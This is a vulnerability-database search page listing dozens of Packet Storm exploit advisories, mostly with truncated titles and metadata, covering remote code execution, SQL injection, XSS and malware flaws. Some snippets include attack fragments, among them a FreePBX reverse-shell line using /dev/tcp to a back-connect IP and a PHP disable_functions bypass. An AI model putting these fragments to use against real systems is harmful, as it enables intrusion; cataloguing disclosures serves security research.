Lucene search
K
PacketstormMost viewed

50738 matches found

Packet Storm
Packet Storm
•added 2021/06/02 12:0 a.m.•347 views

Apache Airflow 1.10.10 Remote Code Execution

Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution Date: 2021-06-02 Exploit Author: Pepe Berba Vendor Homepage: https://airflow.apache.org/ Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html Version: = 1.10.10 Tested on: Docker...

7.5CVSS0.2AI score0.997EPSS
Exploits10
Packet Storm
Packet Storm
•added 2021/06/01 12:0 a.m.•347 views

Backdoor.Win32.NetSpy.10 Heap Corruption

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/e677149c35cbba118655d9b133da8827.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.NetSpy.10 Vulnerability: Heap Corruption Description: The malware listens on TCP port...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/04/05 12:0 a.m.•347 views

Basic Shopping Cart 1.0 SQL Injection

Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass Date: 2021-04-03 Exploit Author: Viren Saroha illusion Vendor Homepage: https://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html Software Link:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/04/03 12:0 a.m.•347 views

Simple Food Website 1.0 SQL Injection

Exploit Title: Simple Food Website CMS | Admin Bypass SQLi Exploit Author: Richard Jones Date: 02-04-2021 Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/12510/simple-food-website-php.html Version: 1.0 Tested On: Windows 10 Home 19041 x6486 + XAM...

Exploits0
Packet Storm
Packet Storm
•added 2021/03/17 12:0 a.m.•347 views

Trojan-Dropper.Win32.Delf.p Missing Authentication

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/b02cc578d2e7f24fb67ec0afc42a9e13.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan-Dropper.Win32.Delf.p Vulnerability: Missing Authentication Description: Delf.p drops an...

0.2AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/01/12 12:0 a.m.•347 views

Backdoor.Win32.Zombam.a Remote Stack Buffer Overflow

Discovery / credits: malvuln - Malvuln.com c 2021 Original source: https://malvuln.com/advisory/6c5081e9b65a52963b0b1ae612ef7eb4.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Zombam.a Vulnerability: Remote Stack Buffer Overflow Description: The malware listens...

0.8AI score
Exploits0
Packet Storm
Packet Storm
•added 2019/10/04 12:0 a.m.•347 views

PHP 7.3 disable_functions Bypass

= 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$i = 0; $i = 8; function leak$addr, $p = 0, $s = 8 global $abc, $helper; write$abc, 0x68, $addr + $p - 0x10; $leak = strlen$helper-a; if$s != 8 $leak %= 2 $s 8 - 1; return $leak; function parseelf$base $etype =...

Exploits0
Packet Storm
Packet Storm
•added 2019/09/09 12:0 a.m.•347 views

Tibco JasperSoft Path Traversal

Title: CVE-2018-18809 Path traversal in Tibco JasperSoft Credit: Elar Lang / https://security.elarlang.eu Vendor/Product: Tibco JasperSoft https://www.jaspersoft.com/ Vulnerability: Path traversal CVE: CVE-2018-18809 Path traversal Vulnerability is in reportresource/reportresource/ service and in...

4CVSS6.8AI score0.79064EPSS
Exploits4
Packet Storm
Packet Storm
•added 2018/11/15 12:0 a.m.•347 views

Malicious Git HTTP Server

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Malicious Git HTTP Server For CVE-2018-17456', 'Description' = %q This module exploits CVE-2018-17456, which affects Git versions 2.14.5, 2.15.3,...

9.3AI score0.97356EPSS
Exploits12
Packet Storm
Packet Storm
•added 2017/03/16 12:0 a.m.•347 views

Microsoft Internet Information Services Cross Site Scripting

Cross Site Scripting / HTML injection vulnerability in Microsoft Internet Information Services web server ================================== Versions Affected: MS Internet Information services All platforms and versions ================================== CVE Reference: CVE-2017-0055...

7.4AI score0.16369EPSS
Exploits2
Packet Storm
Packet Storm
•added 2024/09/06 12:0 a.m.•346 views

C-MOR Video Surveillance 5.2401 / 6.00PL01 Command Injection

Advisory ID: SYSS-2024-030 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Versions: 5.2401, 6.00PL01 Tested Versions: 5.2401, 6.00PL01 Vulnerability Type: OS Command Injection CWE-78 Risk Level: High Solution Status: Open Manufacturer Notification: 2024-04-05 Solution...

7.4AI score0.02612EPSS
Exploits2
Packet Storm
Packet Storm
•added 2024/09/03 12:0 a.m.•346 views

Online Travel Agency System 1.0 Arbitrary File Upload

============================================================================================================================================= | Title : Online Travel Agency System v1.0 Remote File Upload Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2024/04/10 12:0 a.m.•346 views

Joomla SP Page Builder 5.2.7 SQL Injection

==================================================================================================================================== | Title : SP Page Builder 5.2.7 Sql injection Vulnerability | | Author : indoushka | | Tested on : windows 10 FranƧais V.Pro / browser : Mozilla firefox 69.032-bit ...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2024/03/14 12:0 a.m.•346 views

Viessmann Vitogate 300 2.1.3.0 Remote Code Execution

Exploit Title: Viessmann Vitogate 300 = 2.1.3.0 - Remote Code Execution RCE - Shodan Dork: http.title:'Vitogate 300' - Exploit Author: ByteHunter - Email: [email protected] - Version: versions up to 2.1.3.0 - Tested on: 2.1.1.0 - CVE : CVE-2023-5702 & CVE-2023-5222 import argparse import...

9.8CVSS9.8AI score0.74697EPSS
Exploits4
Packet Storm
Packet Storm
•added 2024/02/15 12:0 a.m.•346 views

Metabase 0.46.6 Remote Code Execution

Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution Google Dork: N/A Date: 13-10-2023 Exploit Author: Musyoka Ian Vendor Homepage: https://www.metabase.com/ Software Link: https://www.metabase.com/ Version: metabase 0.46.6 Tested on: Ubuntu 22.04, metabase 0.46.6 CVE : CVE-2023-38646...

9.8CVSS7.4AI score0.97924EPSS
Exploits36
Packet Storm
Packet Storm
•added 2023/12/04 12:0 a.m.•346 views

WordPress Phlox-Pro Theme 5.14.0 Cross Site Scripting

Exploit Title: WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting XSS Date: 3/12/2023 Exploit Author: Haktrak Team Vendor Homepage: https://phlox.pro Software Link: https://www.phlox.pro/go/ Version: 5.14.0 Tested on: Linuxapache/wordrepss 6.3.1 Description: A Cross Site Scripti...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2023/07/07 12:0 a.m.•346 views

Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Local File Inclusion

==================================================================================================================================== | Title : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 ASIK LFI Vulnerability | | Author : indoushka | | Tested on : windows 10 FranƧais V.Pro / browser : Mozill...

7.1AI score
Exploits0
Packet Storm
Packet Storm
•added 2023/06/30 12:0 a.m.•346 views

GZ Appointment Scheduling 1.8 Cross Site Scripting

ā”Œā”Œā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā” ││ C r a C k E r ā”Œā”˜ ā”Œā”˜ T H E C R A C K O F E T E R N A L M I G H T ││ ā””ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”˜ā”˜ ā”Œā”€ā”€ā”€ā”€ From The Ashes and Dust Rises An...

7.1AI score
Exploits0
Packet Storm
Packet Storm
•added 2023/06/14 12:0 a.m.•346 views

Sales Tracker Management System 1.0 HTML Injection

Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities Google Dork: NA Date: 09-06-2023 EXPLOIT-AUTHOR: AFFAN AHMED Vendor Homepage: Software Link: Version: 1.0 Tested on: Windows 11 + XAMPP CVE : CVE-2023-3184 ============================== CREDENTIAL TO USE...

7.1AI score0.02264EPSS
Exploits4
Packet Storm
Packet Storm
•added 2023/05/12 12:0 a.m.•346 views

Millhouse-Project 1.414 Shell Upload

sdsdsds ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="category" 1 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition...

7.1AI score
Exploits0
Packet Storm
Packet Storm
•added 2023/04/20 12:0 a.m.•346 views

FUXA 1.1.13-1186 Remote Code Execution

Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution RCE Date: 18/04/2023 Exploit Author: Rodolfo Mariano Vendor Homepage: https://github.com/frangoteam/FUXA Version: FUXA V.1.1.13-1186 current from argparse import RawTextHelpFormatter import argparse, sys, threading, requests...

6.8AI score
Exploits0
Packet Storm
Packet Storm
•added 2023/02/28 12:0 a.m.•346 views

WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting

==== Z://USB-00RESEARCH/WORDPRESS/ ============================================= 2023 == Report Title: WordPress Real Estate 7 Theme = 3.3.4 - Unauthenticated Reflected Cross-Site Scripting XSS Google Dork: inurl:/wp-content/themes/realestate-7/ Research Date: 2023-02-10 Researcher: FearZzZz...

Exploits0
Packet Storm
Packet Storm
•added 2022/09/20 12:0 a.m.•346 views

Buffalo TeraStation Network Attached Storage (NAS) 1.66 Authentication Bypass

Exploit Title: Buffalo TeraStation Network Attached Storage NAS 1.66 - Authentication Bypass Date: 2022-08-11 Exploit Author: JORDAN GLOVER Type: WEBAPPS Platform: HARDWARE Vendor Homepage: https://www.buffalotech.com/ Model: TeraStation Series Firmware Version: 1.66 Tested on: Windows 10 An...

0.2AI score
Exploits0
Packet Storm
Packet Storm
•added 2022/07/29 12:0 a.m.•346 views

Transposh WordPress Translation 1.0.8.1 Information Disclosure

RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/ Type: Exposure of Sensitive Information to an Unauthorized Actor CWE-200...

5.3AI score0.02936EPSS
Exploits4
Packet Storm
Packet Storm
•added 2022/06/27 12:0 a.m.•346 views

WordPress W-DALIL 2.0 Cross Site Scripting

Exploit Title: WordPress Plugin W-DALIL - Stored Cross Site Scripting Date: 27-06-2022 Exploit Author: Mariam Tariq - HunterSherlock Vendor Homepage: https://wordpress.org/plugins/w-dalil/ Version: 2.0 Tested on: Firefox Contact me: [email protected] Vulnerable Code: " value="" / Steps To...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2022/01/06 12:0 a.m.•346 views

Backdoor.Win32.SVC Buffer Overflow

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/011961a42700e7385a106d362eb661c7.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.SVC Vulnerability: Remote Stack Buffer Overflow Description: The malware listens on T...

0.7AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/12/28 12:0 a.m.•346 views

Terramaster F4-210 / F2-210 Remote Code Execution

/bin/env python """ Product: Terramaster F4-210, Terramaster F2-210 Version: TOS 4.2.X 4.2.15-2107141517 Author: n0tme thatsn0tmysite Description: Chain from unauthenticated to root via session crafting. """ import urllib3 import requests import json import argparse import hashlib import time...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/12/09 12:0 a.m.•347 views

LimeSurvey 5.2.4 Remote Code Execution

Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution RCE Authenticated Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login Date: 05/12/2021 Exploit Author: Y1LD1R1M Vendor Homepage: https://www.limesurvey.org/ Software Link:...

0.3AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/11/22 12:0 a.m.•346 views

Backdoor.Win32.Agent.ad Insecure Credential Storage

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/d2b933ebadd5c808ca4c68ae173e2d62.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.ad Vulnerability: Insecure Credential Storage Description: The malware listens ...

7.1AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/11/15 12:0 a.m.•346 views

WordPress Contact Form To Email 1.3.24 Cross Site Scripting

Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting XSS Authenticated Date: 11/11/2021 Exploit Author: Mohammed Aadhil Ashfaq Vendor Homepage: https://form2email.dwbooster.com/ Version: 1.3.24 Tested on: wordpress POC 1. Click Contact form to Email...

7.1AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/10/18 12:0 a.m.•346 views

Virus.Win32.Ipamor.c Unauthenticated Remote System Reboot

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/bbf032a3aa288f02403295f0472d1f05.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Virus.Win32.Ipamor.c Vulnerability: Unauthenticated Remote System Reboot Description: The malware...

Exploits0
Packet Storm
Packet Storm
•added 2021/10/12 12:0 a.m.•346 views

Moodle SpellChecker Path Authenticated Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Moodle SpellChecker Path Authenticated Remote Command Execution', 'Description' = %q Moodle allows an authenticated administrator to define...

9.1CVSS0.5AI score0.42566EPSS
Exploits11
Packet Storm
Packet Storm
•added 2021/10/11 12:0 a.m.•346 views

Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Root

!/usr/bin/env python3 Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root Telnet/SSH Vendor: Cypress Solutions Inc. Product web page: https://www.cypress.bc.ca Affected version: CTM-ONE 1.3.6-latest CTM-ONE 1.3.1 CTM-ONE 1.1.9 CTM200 2.7.1.5659-latest CTM200 2.0.5.3356-184 Summar...

0.3AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/07/26 12:0 a.m.•346 views

Backdoor.Win32.Bifrose.acci Buffer Overflow

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/611dbff0d68df777c6d6881e00440143.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Bifrose.acci Vulnerability: Local Stack Buffer Overflow Description: Bifrost doesn't...

0.8AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/04/30 12:0 a.m.•346 views

HEUR.Trojan.Win32.Bayrob.gen Insecure Permissions

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/765698ccfb033c86eea6d293235d7ed0.txt Contact: [email protected] Media: twitter.com/malvuln Threat: HEUR.Trojan.Win32.Bayrob.gen Vulnerability: Insecure Permissions Description: The malware creates a...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2021/03/03 12:0 a.m.•346 views

Backdoor.Win32.BO2K.ab Buffer Overflow

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/ca4e5a6ff033b62fa59de5a5dd24c7f9.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.BO2K.ab Vulnerability: Local File Buffer Overflow Description: PsyConf - Program...

0.7AI score
Exploits0
Packet Storm
Packet Storm
•added 2020/03/28 12:0 a.m.•346 views

IBM Cognos TM1 / IBM Planning Analytics Server Configuration Overwrite / Code Execution

Hi, Here's a fun one I have been working on for some time. tl;dr IBM PA / TM1, dating back to 2014, maybe 2009 is vulnerable to a unauthenticated configuration overwrite; this is abused to "fake authenticate" to it, and finally execute code as root / SYSTEM using TM1 scripting. Advisory below,...

10CVSS0.1AI score0.86441EPSS
Exploits6
Packet Storm
Packet Storm
•added 2019/11/25 12:0 a.m.•346 views

Microsoft Windows AppXsvc Deployment Extension Privilege Escalation

Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation Date: 2019-11-22 Exploit Author: Abdelhamid Naceri Vendor Homepage: www.microsoft.com Tested on: Windows 10 1903 CVE : CVE-2019-1385 Windows: "AppX Deployment Service" AppXSVC elevation of privilege vulnerability...

6.1CVSS0.6AI score0.03595EPSS
Exploits4
Packet Storm
Packet Storm
•added 2019/08/02 12:0 a.m.•346 views

Sar2HTML 3.2.1 Remote Command Execution

Exploit Title: sar2html Remote Code Execution Date: 01/08/2019 Exploit Author: Furkan KAYAPINAR Vendor Homepage:https://github.com/cemtan/sar2html Software Link: https://sourceforge.net/projects/sar2html/ Version: 3.2.1 Tested on: Centos 7 In web application you will see index.php?plot url...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2025/03/17 12:0 a.m.•345 views

Linux Landlock Disable

A logic bug was discovered in Linux that makes it possible for a process to get rid of all Landlock restrictions applied to it. I found a logic bug that makes it possible for a process to get rid of all Landlock restrictions applied to it: When a process' cred struct is replaced, this almost alwa...

6.8AI score0.00287EPSS
Exploits2
Packet Storm
Packet Storm
•added 2024/10/23 12:0 a.m.•345 views

ABB Cylon Aspect 3.08.01 logCriticalLookup.php Unauthenticated Log Disclosure

ABB Cylon Aspect 3.08.01 logCriticalLookup.php Unauthenticated Log Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.01 Summary: ASPECT is an award-winning scalable building energy...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2024/10/07 12:0 a.m.•345 views

GeoServer 2.25.1 Code Injection

============================================================================================================================================= | Title : GeoServer 2.25.1 Code Injection Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firefox 130.0.2 64 bits...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2024/10/01 12:0 a.m.•345 views

Simple Music Management System 1.0 Arbitrary File Upload

============================================================================================================================================= | Title : Simple Music Management System v1.0 Remote File Upload Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2024/09/18 12:0 a.m.•345 views

Beauty Parlour And Saloon Management System 1.1 Insecure Settings

==================================================================================================================================== | Title : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2024/08/31 12:0 a.m.•345 views

IBM Data Risk Manager Arbitrary File Download

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'IBM Data Risk Manager Arbitrary File Download', 'Description' = %q IBM Data Risk Manager IDRM contains two vulnerabilities that can be chained by...

10CVSS6.9AI score0.71363EPSS
Exploits10
Packet Storm
Packet Storm
•added 2024/06/03 12:0 a.m.•345 views

FreePBX 16 Remote Code Execution

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2024/02/05 12:0 a.m.•345 views

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting XSS Date: April 18, 2023 Exploit Author: Andreas Finstad 4ndr34z Vendor Homepage: https://www.whatsupgold.com Version: v.22.1.0 Build 39 Tested on: Windows 2022 Server CVE : CVE-2023-35759 Reference:...

6.1CVSS7.4AI score0.0213EPSS
Exploits3
Packet Storm
Packet Storm
•added 2024/01/11 12:0 a.m.•345 views

PHPJabbers Meeting Room Booking System 1.0 Missing Rate Limiting

Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/meeting-room-booking-system/sectionDemo Version: v1.0 Test...

7.4AI score0.00386EPSS
Exploits2
Packet Storm
Packet Storm
•added 2023/12/08 12:0 a.m.•345 views

Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFTDEFENDERANTIMALWAREPOWERSHELLAPIUNINTENDEDCODEEXECUTION.txt + twitter.com/hyp3rlinx + x.com/hyp3rlinx + ISR: ApparitionSec Vendor www.microsoft.com Product Windows...

7.4AI score
Exploits0
Packet Storm
Packet Storm
•added 2023/11/13 12:0 a.m.•345 views

Penglead 2.0 SQL Injection

Title: penglead-2.0 SQLi-Bypass Authentication Author: nu11secur1ty Date: 11/10/2023 Vendor: https://www.mayurik.com/ Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download Reference: https://portswigger.net/web-security/sql-injection Description: The id...

7.4AI score
Exploits0
Total number of security vulnerabilities5000